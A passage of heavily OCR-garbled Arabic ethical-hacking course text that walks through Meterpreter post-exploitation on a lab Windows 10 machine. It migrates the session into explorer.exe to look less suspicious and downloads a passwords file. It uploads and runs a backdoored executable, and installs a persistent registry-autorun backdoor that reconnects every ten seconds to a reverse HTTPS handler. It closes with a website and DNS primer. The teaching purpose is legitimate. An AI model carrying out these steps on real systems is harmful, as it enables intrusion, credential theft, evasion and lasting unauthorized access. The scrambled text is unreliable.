disable unicode encoding 
enable unicode encoding 
exit 

qet timeouts 
quid 

help 

info 

irb 

El 
machine id 
migrate 
pivot 

quit 

El 
resource 

run 

sessions 

set timeouts 
sleep 

ssl verify 
transport 
use 

uuid 

write 


أول ما سنقوم بتسليط الضوء عليه هو أمر الخلفيةء كما هو موضح في لقطة الشاشة التالية: 


reter 


[*] Backgrounding session 2... 


يستخدم أمر الخلفية )04٥)9۲01١٨4(‏ بشكل أساسي لجعل الجلسة الحالية في الخلفية دون إنهائها. هذا 
الأمر مشابه جدًا لتصغير النافذة. لذلك» بعد تشغيل أمر الخلفيةء يمكننا العودة إلى اأهامءه16 وتشغيل 


LOT] TTT TTT 


أوامر أأخرى لاستغلال الجهاز الهدف بشكل أكبرء مع الحفاظ على اتصالنا بالحاسوب الذي اخترقناه للتو . 
سوف نستخدم الأمر |- ١٥0أءءهءء‏ للاطلاع على قائمة بجميع أجهزة الحاسوب والجلسات التي 
نستخدمها. في لقطة الشاشة التاليةء يمكننا أن نرى أنه لا يزال لدينا جلسة ١66١م66۲"‏ وهي بين 
جهازنا» وهو 10.0.2.15» والجهاز الهدف» وهو 10.0.2.5: 


J = sessions -l 


Id Name Type Information Connection 


۳ meterpreter x86/windows MSEDGEWINION\IEUser (@ MSEDGEWIN1O 10.0.2.15:8080 -= 10.0.2.5:49932 (10.0.2.5) 


إذا أردنا العودة إلى الجلسة السابقة لتشغيل †أهامعه6" مرة أخرىء» يتعين علينا تشغيل أمر 8١0أSSئ6ك‏ 


msf exploit ( J) > sessions -iÎİ 2 
][*] Starting interaction with 2... 


آمر آخر سنقوم بتشغیله کلما اخترقنا نظام وھو أمر ٣۴١‏ أءلاء. یوضح لنا الأمر ٥۴٣٤ء‏ المعلومات 
حول الحاسوب الهدف. في لقطة الشاشة التاليةء يمكننا أن نرى أنها توضح لنا اسم الحاسوب ونظام 
التشغيل الخاص به وبنيته. يمكننا أيضًا أن نلاحظ في لقطة الشاشة التالية أنه حاسوب 64 بت» لذلك 
إذا أردنا تشغيل الملفات التنفيذية على الجهاز المستهدف في المستقبل» فنحن نعلم أننا سننشئ ملفات 
تنفيذية 64 بت: 


meterpreter > sSysinîo 
: MSEDGEWIN 1O 
Windows 10 (Build 17134]. 

xO4 


System Language : en US 
Domain : WORKGROUP 
Logged On Users : 3 
Meterpreter : X86/w1indows 


java WV point CA 


يمكننا أن نرى أنه يستخدم اللغة الإنجليزيةء ومجموعة العمل التي يعمل عليها الحاسوب» ومعرف المستخدم 
الذي تم تسجيل دخوله. يمكننا أيضًا مشاهدة إصدار 166۲۲۴۲6١‏ الذي يعمل على الجهاز المستهدف› 


الأمر الآخر المفيد لجمع المعلومات هو وا؟١هءم|.‏ يوضح لنا الأمر وا؟١٥ء‏ ما جميع الواجهات المتصلة 


: Software Loopback Interface 1 
Hardware MAC : O00:00:00:00: O00: O0 
MTU : 429496725 
IPv4 Address : 127.0.0.1 
IPv4 Netmask : 255.0.0.0 
IPv6 Address : ::1 
IPv6 Netmask : TTTT:TTTT:TTTTE:TTTTE:TTTT:TTTT:TTTT:TTTT 


: Intel(R} PRO/1900 MT Desktop Adapter 
Hardware MAC : O08:00:27:04:18:04 
MTU : 15090 
IPv4 Address : 10.0.2.5 
IPv4 Netmask : 255.255.255.09 
IPv6 Address : fTfe8BO0::T590:a0cd:d841: d69b 
IPv6 Netmask : TTTT:TTTTE:TTTTETTTT: : 


في لقطة الشاشة السابقةء يمكننا رؤية الواجهة (6٥6۲۵)١!ا)‏ 1 وعنوان ۸۱۸٤‏ وعنوان ۴| وحتى عنوان 
4ء المتصل بشبكات متعددة. يمكننا أيضًا روؤية كل الواجهات وكيفية التفاعل معها. 

الأمر المفيد الآخر المستخدم لجمع المعلومات هو أمر كم. يسرد الأمر كم جميع العمليات التي تعمل 
على الحاسوب الهدف. قد تكون هذه العمليات هي العمليات الخلفية أو البرامج الفعلية التي يتم تشغيلها 
في المقدمة كبرنامج ۷1١00۷5‏ أو واجهة المستخدم الرسومية. في لقطة الشاشة التاليةء سنرى قائمة 


بجميع العمليات التي تعمل» جنبًا إلى جنب مع اسم كل واحد ومعرفه (۱۵) أو معرف المنتج(۶۱0): 


a 


METETpBTLELEET FF 05S 


Process List 


Name User Path 


[System Process] 

System 

firefox.exe MSEDGEWIN1O\IEUser C:\Program Files\Mozilla Firefox\firefox.exe 
Registry 

IEE ENG 

svchost.exe 

svchost.exe 

csrss.exe 

svchost.exe 

wininit.exe 

csrss.exe 

Windows .WARP. JITService.exe 

winlogon.exe 

services.exe 

ICEEEDG 

svchost.exe 

fontdrvhost 

fontdrvhost . 

svchost.exe MSEDGEWIN1O0\IEUser C:\Windows\System32\svchost .exe 
svchost.exe 

svchost.exe 

svchost.exe 

svchost.exe 

dllhost.exe MSEDGEWIN1O0\IEUser C:\Windows\System32\dllhost.exe 


عملية واحدة مثيرة للاهتمام هو ٥×۴.١۴١٠|م×ع.‏ إنها واجهة رسومية لنظام .۷/|١۵00۷6S‏ في لقطة الشاشة 
السابقةء يمكننا أن نرى أنه يعمل على 4744 ۲|0» كما هو موضح في لقطة الشاشة التالية: 


4744 4688 explorer.exe x64 1 MSEDGEWIN1O0\IEUSer C:\Windows\explorer. exe 
4780 svchost.exe 
4864 svchost.exe 
4956 svchost.exe 


5028 svchost.exe MSEDGEWIN1O0\IEUSser C:\Windows\System32\svchost .exe 
5076 MicrosoftEdge. exe MSEDGEWIN10\IEUSser C:\Windows\SystemApps\Microsoft.MicrosoftEdge 8wekyb3d8bbwe\Mic 
rosoftEdge.exe 


عندما نخترق النظام» من المستحسن ترحيل العملية التي يعمل بها الشخص إلى عملية أكثر أمائًا. على 
سبيل المثال» عملية ٥×۴٠.١۲6٠ام×٠‏ هي الواجهة الرسومية لنظام ١۵0۷WS‏ 1ء وهذه العملية تعمل دائمًاء 
طالما أن المستخدم يستخدم جهازه. هذا يعني أن هذه العملية أكثر أمانًا من العملية التي تمكنا من خلالها 
الوصول إلى جهاز الحاسوب. على سبيل المثال» إذا تمكنا من الوصول من خلال برنامج أو قابل للتنفيذء 
فسوف نفقد العملية عندما أغلق الشخص ذلك البرنامج. هناك طريقة أفضل تتمتل في الترحيل إلى عملية 
أقل احتمالا لإنهائها أو إغلاقها. للقيام بذلك» سنستخدم أمر الترحيل» الذي سينقل جلستنا الحالية إلى 
عملية مختلفة. سنستخدم عملية ۵×٠.١٠۲ه0ام×م»‏ لأنها آمنة. 


نستخدم الأمر 4744 ١هإواص»‏ حيث 4744 هر ۴|١‏ لعملية ه٠×٠.١٠١ه٠ام×ه.‏ الأمر كالتالي: 


reter > migrate 4744 
[]*] Migrating from 6888 to 4744... 


][*] Migration completed successfulLy. 


8 java WV point 


في تلك اللحظة»ء يتم تشغيل ١١٤١٠۲م۲٥N6‏ من عملية ٥×۴٠.١١۲١٠ام×ه.‏ الان إذا ذهبنا إلى "إدارة المهام' 
ask Manager)‏ ا) على الجهاز الهدف وقمنا بتشغيل '"إدارة اlئnمgارد" pû «(Resource Manager)‏ 
انتقلنا إلى علامة التبویب 'الشبکة' )/eW0۲K(‏ وانتقلنا إلى ionsاeمصCon ٣C٥‏ یمکننا أن نری أن 
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الاتصال على المنفذ 8080 يأتي من عملية ه×٠.١١۲٥ام×ه»‏ كما هو موضح في لقطة الشاشة التالية: 


Resource Hloinikoir‏ ا 


File Ferba Help 


vervi CPL Hiermary Disk Rlebasork 

: TT 3 
Processes with Network Activity ر‎ | ews je 
TL PID 3 êm (BS ê] Hatemê [Bre Telal Efê Network 10 Kbps 


[Î syste 4 20 : 3 
Three [Metal aerarEe E 4 3 H4 
LJ TE FLEE [ETT HF FÊ 5 3 
0J th TLeê Laas ر‎ 11 1 13 
Sear chUl.ewEe | 4 ل قطان‎ EL 
| gsplorer.ese 115 هد‎ 15 31 


EÛ Serarmds 


IP GF EE 1Û 


Network fctivity Wl 2 tbpî Nêlwark O E Hebêk Rii ا‎ 


TEP Lonnettians بار‎ 


mag AÛ 1 ëtal lafal Fêm Hamî Partkê Lalêfî 


En pIOrELEE aS di A STA DAR, N 1 0 Ethemel O iy 
N EE 111 7 1 اك ا‎ 1 Û 
SrarChNLILEHE 1H2 11 FTA 2E... 3 
SeaithlUL ene 190 12. 5750  2M,7 3 
N JL 111 EERE TAE.. 1 
e ral Fl AH 1 STITH THEH., d3 
1 a اا .ا‎ 
FA ploFErFEE ZI 11 LENE A, HF 


لذلك» بالنسبة للجهاز المستهدف» فهو لا يأتي من الباب الخلفي» أو من حمولتتاء أو من ملف ضار» بل 
يعمل من خلال ۲6۲.6×6٥ام×6.‏ وهو أمر غير مشبوه بالجهاز المستهدف. الآن» إذا رأينا Chrome‏ 
أو ×٥۲6أ۴ء‏ فيمكننا الانتقال إلى تلك العمليات. واذا كنا نستخدم المنفذ 8080 أو 80 للاتصال» فسيبدو 
الأمر أقل تشككاء لأن خادم الويب يستخدم المنفذ 8080 أو 80ء لذلك فمن الطبيعي للغاية أن يكون 
هناك اتصال من خلاله. 


LLI] TTT TT 


java WV point 4 


الآن» سننظر في بعض الأوامر الإضافية التي تسمح لنا بتحميل وننزيل وقائمة وقراءة وتصفح وننفيذ 
الملفات على الجهاز المستهدف. لدينا جلسة عمل وهي ١6٤١١م66۲ء‏ وأول شيء سنفعله هو تشغيل 
الأمر ١۷م‏ للحصول على دليل العمل الحالي الخاص بنا. سيأخذنا هذا الأمر إلى موقع ك٣#ءل‏ | :©. 
الآن» سنقوم بتشغيل الأمر 5| لسرد جميع الملفات والدلائل» كما هو موضح في لقطة الشاشة التالية: 


Last modified Namê 
{OF FTF 7 TFWKFWXFWX LI 2018-04-11 19:45:03 -0400 All Users 
40555/F-XF-XF-X LI 2018-04-25 :47:56 |ا-‎ Default 
{4077 F7 TWXFWX TWX Lr 2018-04-11 :45:0: 9 Default User 
FOF FFF TWXFWXFWX LI #018-O7-17 O2:28:4 1IEUser 
40555/F-XF-XF-X 36 Lr 2018-04-25 :48: 2 Public 
100666/ rw- FW- FW- 11 2018-04-11 19:36:38 desktop. ini 
4O7 777 TWXFWXFWX Lr  #2018-07-16 E: | sshd server 


دعنا نفترض آننا نريد الانتقال إلى مجلد ١#ءلاع٤|.‏ للقيام بذلك» سوف نقوم بتشغيل الأمر ٣#ءلع| .cd‏ 
إذا قمنا بتشغيل ۷۵« يمكننا أن نرى أننا سنكون في دليل ۲٥ءلاع۴|‏ | كاهلا | :©. بعد ذلك» سوف 
نذهب إلى دليل التنزيلات وتشغيل الأمر كا لسرد الملفات» كما هو موضح في لقطة الشاشة التالية: 


meterpreter = cd IEUser 


C: :\Users\IEUser 
erpreter = cd Downloads 


ENS 


100666/rw-rw-rw- 458959 2018-07-24 05:50:| Image jpg. zip 
10O0FFFFFWXFWXNFWX A291l2250 LL 2018-07-25 :2ا1‎ browser „. exe 
1090666/rw-rw-rw- A82 11 2018-07-16 03:19:1 desktop. ini 
100777 FWXFWXFWX 894970 11 2018-07-24 03: 1 image . exe 
190666/rw-rWw-rwW- 7F l1 2018-07-25 03:19:14 إ-‎ EEL E 1 
100777 FTWXFWXFWX 894970 LL 2018-07-24 05: : LeEsl.exe 
1007777 rWXrWXrWX © 2018-07-25 O2:11:. 00 update.exe 


STE. 


في لقطة الشاشة السابقةء يمكننا رؤية ملف >.5١١55«W“0ه0»‏ والذي يبدو كملف مثير للاهتمام. إذا 


كنا نريد قراءة هذا الملف» فيمكننا تشغيل الأمر أ>.0455W0۲۵5.‏ في لقطة الشاشة التاليةء يمكننا رؤية 


> cat paswords. txt 


إذا تحققنا من هذا الملف» فسنرى أن الإخراج الذي تلقيناه من الأمر ٥4‏ يطابق محتوى الملف. 


لنفترض أننا نريد الاحتفاظ بهذا الملف في وقت لاحق. سنقوم بتنزيله باستخدام أمر 40۷1030 واسم 
الملف» وهو أ×.sل0۲سءءهم.‏ الأمر كالتالي: 


meterpreter >= download paswords. txt 
[]*] Downloading: paswords.txt -> paswords. txt 


[*] Downloaded 7.00 B of 7.00 B (100.0%): paswords.txt -> paswords. txt 
][*] download : paswords.txt -> paswords. txt 


رؤية الملف المسمى أ>أ.0455«۷0۲۵5» كما هو موضح في لقطة الشاشة التالية: 


:~# CÛ /rooty/ 
:~# 5s 
alert. ]5 sniff -2018-07-16-eth.pcap 
bdfproxy msf resource.rc Templates 
Desktop test-UpCc-O01. cap 
Document s5 test-UpC-O01.CSV 
Down Loads test-upc-O01.kismet.CSv 


hamster. txt test-upc-O01. kismet.netxml 
Mus1c test-upc-O02. cap 

'New Graph (1).mtgl' LesT-UpC-O2.CSV 

paswords. txt test-upc-O02. kismet. CSV 
Pictures test-upc-O02.kismet.netxml 
proxy. log Videos 

Public 


' point 


الآن» لنفترض أن لدينا حصان طروادة أو 996۲٥ال6‏ أو فيروس أو باب خلفي نريد أن نرفعه إلى 
الحاسوب المستهدف. إذا ذهبنا إلى الدليل الجذر لديناء يمكننا أن نرى الكثير من الملفات» بما في ذلك 


00rd -caاc. exe‏ ackdط.‏ سنقوم بتحمیل هذا الملف باستخدام أمر 0٩هام‏ لاء إلى جانب اسم الملف 
وهو c2|.e×8-ooredل)acط.‏ الأمر كالتالي: 


upload backdoored-calc.exe 


الآن» سنقوم بتشغيل الأمر كا لرؤية قائمة الملفات. في لقطة الشاشة التاليةء يمكننا رؤية ملف جديد 
:backdoored-calCc.6XxX0ê ym‏ 


meterpreter #* 


S1ze ۷D EE 
100666/rw-rw-rw- 458959 2018-07-24 :58: ImagejpPg.z1p 
1O0OF7TFTFTFFWXFWKXFWX 2912256 2018-07-25 Fa backdoored-calc.exe 
1O0O07F7F7FFWXFWXFWX 2912256 | 2018-07-25 12 browser. exe 
1006667 rw-rw-rwWw- A282 2018-07-16 03:19: desktop. ini 
1007777 FTWXrWXrWX 894976 2018-07-24 03:45: imaqe . exe 
10909666/rw-rw-rwW- FF 2018-07-25 :19: paswords. txt 
1OO0FJFFFFFTWXFWXFWX 894970 2018-07-24 5:51: tesl.exe 
1007777 FWXrWXrFWX 8O 2018-07-25 L1: update . exe 


سنقوم بتشغيل الأمر ×6٥‏ لتنفيذ الملف الذي تم تحميله على الحاسوب الهدف» تم نحدد الخيار -f‏ 
مع اسم الملف الذي نريد تنفيذه وهو -٥2|٥.۴×0‏ ١۲٥٥ل‏ )ء2ط. بمجرد أن نقوم بتنفيذها» سنرى أن 
العملية 3324 قد تم إنشاؤهاء لذلك تم تنفيذ بابنا الخلفي: 


meterpreter = execute -f backdoored-calc,exe 


Process 3324 created. 


الآنء إذا كان ه×۴.اaء- ۵0٥0۲6۴۵‏ )ع هط فيروسًا» فسوف يفعل ما يفترض القيام به. 


ميزة أخرى سنناقشها هي الأمر ١ا6٣ك.‏ يقوم بتحويل جلسة عمل ١6٥rمMe†er‏ أو oitاMetasp‏ الحالية 
إلى ااماء نظام التشغيل. إذا قمنا بتشغيل أمر اا6٣5»‏ فسنحصل على سطر أوامر »۷1١۵0۷WS‏ حيث 
يمكننا تنفيذ أوامر ١00۷S‏ 7۷1. في لقطة الشاشة التاليةء يمكننا أن نرى أنها موجودة على قناة مختلفةء 


LAIST TTT TTT 


ویمکننا تشغيل أي أمر WIndows‏ نریده من خلاله. لذلك یمکننا تشغيل الأمر dır‏ لسرد جمیع الأدلةء 
ویمکننا استخدام أي أمر ۷1۸۵0۷8 آخر» تمامًا مثٿل تشغيل الأوامر :Command Promp Jڵlخ j‏ 


Channel 4 created. 


MicrosoTt Windows [Version 10.90.17134. 165| 
(c) 2018 Microsoft Corporation. ALL rights reserved. 


سنقوم بتشغيل أمر 6٠ء‏ تم ننتقل إلى نظام الملفات (۴5۷5۴۳!آ)» وسنرى أنه يمكننا تنزيل الملفات 
وتحريرها وإزالتها وحذفها وإعادة تسمية الملفات والبحث عن الملفات ونقل ملف إلى ملف آخر وما إلى 
ذلك. توضح لقطة الشاشة التالية الأمر الرئيسي الذي يمكننا استخدامه لإدارة نظام الملفات على الحاسوب 
الهدف» كما هو موضح أدناه: 


Stdapi: File system Commands 


Read the contents of a f1le to the screen 
Change directory 


Retrieve the checksum of a file 
Copy source to destination 

List files (alias for l5} 
Download a file or directory 
Edit a file 

Print local working directory 
Print working directory 

Change local working directory 
List local files 

Print local working directory 
List files 

Make directory 

Move source to destination 
Print working directory 

Delete the specified Tile 
Remove directory 

Search for files 

List all mount points/logqical drives 
Upload a file or directory 


checksum 
Lp 

d1r 

down load 
edit 

qet lwd 
qe twd 


MV 
pwd 

1 
rmdir 
search 


show mount 


upload 


Methods to Maintain طرق للحفاظ على الوصول‎ 
aCCESS 


في القسم السابق» رأينا أنه عندما يعيد المستخدم الهدف تشغيل الحاسوب» فإننا نفقد اتصالنا. استخدمنا 
باب خلفي عاديا لهذا السبب» عند إعادة تشغيل الحاسوب» سيتم إنهاء بابنا الخلفي» وسيتم إنهاء العمليةء 
وسنفقد اتصالنا. ولكن في هذا القسم» سنناقش الطرق التي ستمكننا من الحفاظ على وصولنا إلى الحاسوب 
المستهدف. سنقوم باستخدام باب خلفي 111P reverse Mere r٥6۲‏ عکسي لا یمکن اکتشافه 
أنشأناه سابقًا. سنقوم حقنها كخادم بحيث يتم تشغيلها في كل مرة يقوم فيها المستخدم المستهدف بتشغيل 
جهاز الحاسوب الخاص به وسيحاول الاتصال بنا على فترات زمنية معينة. للقيام بذلك» سنقوم بتشغيل 
أمر 9۲٥١١‏ )عمط والتفاعل مع الجلسة على الرقم 2. 


نحن ذاهبون لتشغيل وحدة نمطية باستخدام الأمر .use exploit/windows/local/persistence‏ و 
مثل وحدة متعددة المناولة التي تأتي مع أهامكة16. بعد هذا الأمر» سنقوم بتشغيل الأمر 0۷ء 
4 لمعرفة ما نحتاج إلى تهيئته» كما هو موضح في لقطة الشاشة التالية: 


use exploit/windows/local/persistence 


exploit (multi/handler) > use exploit/windows/local/persistence 
ا٥‎ 1 ne 


nsf 
msf exploit (windo rsistence) > show options 


Module options (exploit/windows/local/persistence) : 


Name Current Setting Required Description 


DELAY Delay (in seconds) for persistent payload to keep reconnecting back. 

EXE _ NAME The filename for the payload to be used on the target host (%RAND%*.exe by default). 

PATH Path to write payload (%TEMP% by default). 

REG _NAME The name to call registry value for persistence on target host (%RAND%* by default). 
SESSION The session to run this module on. 

STARTUP USER Startup type for the persistent payload. (Accepted: USER, SYSTEM) 

VBS_NAME The filename to use for the VBS persistent script on the target host (%RAND%* by default). 


Exploit target: 


Id Name 


أول شيء سنتطرق إليه هو ۸۷ا0۴ وهو عدد الثواني التي سيحاول خلالها الهدف الاتصال بنا. تم 
تعيينه على 10ء وهذا يعني كل 10 ثوان» سيحاول الحاسوب الهدف الاتصال بنا مرة أخرى. الآن» سنقوم 


LILI] TTT TT 


بتعیین .E×E_NA M٤‏ إنه الاسم الذي سيظهر في إطار العمليات التي يستجيب الاتصال منها. سنقوم 
بتعیین E×E_NA۸ M٤‏ على ٥×۴.مW٥0(۲‏ لجعله أقل قابلية للاكتشاف. الأمر كالتالي: 


set EXE NAME browse.exe 


۴۳8 حيث سيتم تثبيت الباب الخلفي أو الحمولة» وستظل كما هي. R٤6_۸N۸M٤‏ هو إدخال 
التسجيل» وسيظل كما هو . تحدد الدورة الجلسةء إذا قمنا بتشغيل الأمر ا- ١10ء65ء»‏ فستدرج الجلسات 
المتاحة» كما هو موضح في لقطة الشاشة التالية: 


msf exploit | J) = sesslons -l 


Active sess1l0n5 


Id Name Type Information Connection 


2 meterpreter x64/windows MSEDGEWIN1O\IEUser @ MSEDGEWIN1O0 10.0.2.15:8080 -> 10.0.2.5:49932 (10.0.2.5) 


سنقوم الآن بتعیین 5E58۱0۸‏ ك 2 باستخدام الأمر التالي: 


1 sese 


سيتم ترك 51۸۸۲1۴ كمستخدم» لامتيازات المستخدم. الآن» سنقوم بتشغيل ١٥0أمه‏ 0W١ء.‏ في لقطة 


الشاشة التاليةء یمکننا أن نری أن ۵×ع.W۷8۲٥0۲‏ وجلسة رقم 2 تم ضبطهما بشكل صحیيح: 


msf exploit ( J) > show options 
Module options (exploit/windows/local/persistence) : 
EI Current Setting Required Description 


DELAY Delay (in seconds) for persistent payload to keep reconnecting back. 

EXE _NAME The filename for the payload to be used on the target host (%RAND%*.exe by default). 

PATH Path to write payload (%TEMP% by default). 

REG _ NAME The name to call registry value for persistence on target host (%RAND%* by default). 
SESSION The session to run this module on. 

STARTUP Startup type for the persistent payload. (Accepted: USER, SYSTEM) 

VBS NAME The filename to use for the VBS persistent script on the target host (%RAND* by default). 


Exploit target: 


Id Name 


0 windows 


الآن» سنقوم بتحديد الحمولة التي سيتم حقنها كخادم. للقيام بذلك» سنقوم بتشغيل الأمر 0۷ء 
44 4anهء‏ وسوف يعرض لذا الخيارات المتقدمة التي يمكننا إعدادها لهذه الوحدة المعينة. في لقطة 


java WV point 


الشاشة التاليةء نحن مهتمون ب ۳٥ایں٤ E×۴::‏ » مما يشير إلى ننا سنستخدم ملف .8×6 مخصص 


msf exploit ( J) = show advanced 
Module advanced options (exploit/windows/local/persistence)}: 


Name Current Setting Required Description 

ContextInformationFile The information file that contains context information 
DisablePayloadHandler true Disable the handler code for the selected payload 

EXE: :Custom Use custom exe instead of automatically generating a payload exe 
EXE : :EICAR 5€ Generate an EICAR file instead of regular payload exe 

EXE: :FallBack : Use the default template in case the specified one is missing 
EXE: :Inject al: Set to preserve the original EXE function 

EXE : :O0OldMethod se Set to use the substitution EXE generation method. 

EXE: :Path The directory in which to look for the executable template 

EXE: :Template The executable template Tile name. 

EXEC AFTER al: Execute persistent script after installing. 
EnableContextEncoding Use transient context when encoding payloads 

HANDLER : Start an exploit/multi/handler job to receive the connection 
MSI: :Custom Use custom msi instead of automatically generating a payload msi 
MSI: :EICAR Generate an EICAR file instead of regular payload msi 

MSI: :Path The directory in which to look for the msi template 

MSI: :Template The msi template file name 

MSI: :UAC Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) 
VERBOSE 5ا‎ Enable detailed status messages 

WORKSPACE Specify the workspace for this module 

EIEN Additional delay when waiting for a session 


سنقوم بتعيین E×E€:: °€us0"‏ على »/ar/www/htm|/backd0o0r.e×e‏ حتی نتمکن من تشغیل 
بابنا الخلفي الذي تم تخزینه في ٥×c)k00۲.eھم/tm۱ا/ar/www/.‏ الأمر کالتالی: 


set EXE::CuUstom /var/www/html#backdoor. exe 


الآن» سوف نقوم بتشغیل آمر ۸0W 0۷۸٥08٩۵‏ ونری أنه تم إعدادہ بشکل صحیح» کما ھو موضح 
فى لقطة الشاشة التالية: 


[LIO] TTT TT 


nsf exploit J) => show advanced 


Module advanced options (exploit/windows/local/persistence)] : 


Name Current Setting Required Description 

ContextInformationFile The information file that contains context information 
DisablePayloadHandler true Disable the handler code for the selected payload 

EXE: :Custom / var /wuw/html/backdoor . exe Use custom exe instead of automatically generating a payload exe 
EXE : :EICAR false Generate an EICAR file instead of regular payload exe 

EXE: :FallBack Talse Use the default template in case the specified one is missing 
EXE: :Inject false Set to preserve the original EXE function 

EXE: :QldMethod false set to use the substitution EXE generation method. 

EXE: :Path The directory in which to look for the executable template 

EXE: :Template The executable template file name. 

EXEC AFTER false Execute persistent script after installing. 
EnableContextEncoding false Use transient context when encoding payloads 

HANDLER Talse Start an exploity/multi/handler job to receive the connection 
MSI: :Custom Use custom msi instead of automatically generating a payload msi 
MSI: :EICAR Generate an EICAR file instead of regular payload msi 

MSI: :Path The directory in which to look for the msi template 

MSI: :Template The msi template file name 

MSI: :UAC false Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) 
VERBOSE false Enable detailed status messages 

WORKSPACE Specify the workspace for this module 

wfsDelay Additional delay when waiting for a session 


الآن» سنقوم بتشغیل آمر ٤اهام×۵.‏ سیتم تحمیل /e×٥.ac)kd00۲م/|htim/ var/www‏ على الحاسوب 
الهدف» باستخدام الجلسة التي حددناهاء وهي 2. في لقطة الشاشة التاليةء يمكننا أن نرى أنه تم تحميلها 


sf exploit | ) > exploit 


Running persistent module against MSEDGEWIN1O0 vıa session ID: 2 
Using custom payload /Var/ww/html/backdoor.exe, RHOST and RPORT settings will be ignored! 
Persıstent VBS script written on MSEDGEWIN1O t 


0 C:\Users\IEUser\AppData\Local\Temp\UatuhS .VbS 

Installing as HKCU\Software\Mic rosoft\Windows\CurrentVerslion\Run\ QwEh rEE J 

Installed autorun on MSEDGEWIN1O as HKCU\Software\Mic rosoft\Windows\CurrentVersion\ Run QwWEh rEE J 

Clean Up Meterpreter RC file: /root/.msf4/ logs/persistence/MSEDGEWIN1O 20160602, 2445 /MSEDGEWIN1O0_20160602., 2445 . re 


إذا لم نعد نريد الباب الخلفي على الحاسوب الهدف» فيمكننا استخدام ملف المورد لحذفه. يمكننا تخزين 
ملف ۸٤‏ كما هو موضح في لفقطة الشاشة السابقة في 0م163 حتى نتمكن من تشغيله في المستقبل 
وحذدف الباب الخلفي الخاص بناً. 


إذا قمنا بتشغيل أمر ا- ١0اءءهء»‏ فسيظهر الجلسات المتاحةء ويمكننا التفاعل معها. باستخدام الأمر 
session -K‏ يمكننا قتل تلك الجأسة. 


java WV point 


الآن» إذا قمنا بتشغيل أمر اء فسنرى أنه ليس لدينا اتصال بالحاسوب الهدف. باستخدام أداة 
الاستغلال المتعددة الخاصة بناء يمكننا الاستماع لاتصال وارد. 


إذا قمنا بتشغيل أهام×6» وكان جهاز الحاسوب الذي تم اختراقه قيد التشغيل بالفعل» فسنحصل على 
اتصال مباشر» لأن هدفنا قد تم حقنه في الحاسوب الهدف على المنفذ 8080 دeلیى .revers_http‏ 
الآن للتأكد» سنبدأً تشغيل آلة Ws٥0ل”۷1.‏ للتأكد من أنه سيكون لدينا دائمًَا اتصال به»ء سنقوم بإعادة 
تشغيل جهاز الحاسوب الذي يعمل بنظام ١00۷S‏ ۷ المستهدف. في كل 10 وان › سیحاول جهاز اج۸ 
الاتصال به» بغض النظر عن عدد المرات التي يتم فيها إيقاف تشغيل جهاز sس0ل"۷‏ أو إعادة 
تشغيله. سنقوم الآن بتشغيل معالج ۲66١‏ م166۲ الخاص بنا وانتظر الاتصال. ثم قم بتشغيل آمر 
e>‏ للاستماع» سيستغرق الاتصال 10 توان كحد أقصى. في لقطة الشاشة التاليةء يمكننا أن نرى 
ننا تلقينا اتصالا بالحاسوب الهدف» والآن لدينا إمكانية الوصول الكامل إلى هذا الحاسوب: 


nsf exploit(multi/handler) => exploit 


[*] Started HTTPS reverse handler on https://10.0.2. 15:8080 


[*] https://10.0.2.15:8080 handling request from 10.0.2.5; (UUID: o6dbxepr) Staging x86 payload (180825 bytes) ... 
[*] Meterpreter session 1 opened (10.0.2.15:8080 ->= 10.0.2.5:49773) at 2018-07-26 07:29:13 -0400 


[IAI] TTT TTT 


java WV point ۵ 


ما هي مواقع الانترنت What is a Website‏ 
في هذا القسم» سوف نفهم ما هو موقع الويب حقا. موقع الويب ليس سوى تطبيق مثبت على جهاز أو 
حاسوب. يحتوي موقع الویب علی تطبیقین رئیسیین هما خادم ویب (علی سبیل المثال» ۸٥م۸)‏ 
وقاعدة بيانات (على سبيل المثال» ا۵؟۷y).‏ 


يستخدم خادم الويب لفهم وتنفيذ تطبيق الويب. يمكن كتابة تطبيق ويب بلغة 2۷2ل أو PHP و۾İ Py h07‏ 
أو أي لغة برمجة أخرى. القيد الوحيد هو أن خادم الويب يجب أن يكون قادرا على فهم تطبيق الويب 


تحتوي قاعدة البيانات على البيانات المستخدمة من قبل تطبيق الويب. يتم تخزين كل هذا على جهاز 

حاسوب يسمى الخادم. الخادم متصل بالإنترنت ولديه عنوان °|ء ويمكن لأي شخص الوصول إليه أو 

اختبار الاتصال به. 

يتم تنفيذ تطبيق الويب إما عن طريق الهدف أو بواسطة خادم الويب المثبت على خادمنا. لذلك» في أي 

وقت نقوم فيه بتشغيل تطبيق ويب أو طلب صفحة» يتم تنفيذه فعليًا على خادم الويب وليس على حاسوب 

العميل . بمجرد تنفیده لے خادم الويب» پرسل خادم الويب صi>ڪة HIML‏ جاهزة للقراءة ال العميل أو 

الشخص المستهدف» كما هو موضح في الرسم البياني التالي: 

د 
| 


DNS SERVER iiss 
َ ك‎ 
195.21.0.0 GOOGLE.COM 
و ار‎ 


> o0 
195.21.0.0 HTML 
WEBSITE 


ا 


لنفترض ننا نستخدم جهاز حاسوب أو هاتقاء ونريد الوصول إلى 0۳ء.ءاوهمو. في عنوان ا۸ل 
الخاص بناء إذا کتبنا 0۳٥.٥91٥٥0و»‏ فسیتم ترجمته إلى عنوان ۴| باستخدام خادہ 0×5 0N5.‏ ھو 


IAF] TTT TT 


خادم يقوم بترجمة کل اسم أو .0۳ أو .ا6۵ أو أي موقع ويب باسم أو اسم مجال إلى عنوان ۴| 
الخاص بہ. إذا طلبنا ٥٥۳‏ .٥9٥٥و‏ فسیذھب الطلب إلی خادہم 0٥ N5‏ ویترجم ١۳٥c0٥.eاوممو‏ إلی ۴| 
حيث يتم تخزين ه٥60091.‏ بعد ذلك» سینتقل خادم N5‏ 0 إلى عنوان ۴| الخاص ب 6009٥‏ وینفد 
الصفحة التي أردنا استخدامها باستخدام جميع التطبيقات التي تحدتنا عنهاء ثم يقدم لنا صفحة ا١1۲‏ 
جاهزة. 

الآن يتم تنفيذ البرنامج على الخادم» وحصانا فقط على ا11 وهي لغة وصفية لصفحات الويب. هذا 
مهم للغايةء لأنه في المستقبل» إذا أردنا تنفيذ أي شيء على خادم الويب» متل اا6ء» فإننا نحتاج إلى 
إرساله بلغة يفهمها خادم الویب (على سبیل المثال »)۴۳١۶‏ وبمجرد قيامنا قم بتنفيذه داخل الخادم» وسيتم 
تنفيذه على الحاسوب الهدف. 


هذا يعني أنه بغض النظر عن الشخص الذي يصل إلى الصفحات» سيتم تنفيذ مجموعة الويب التي 
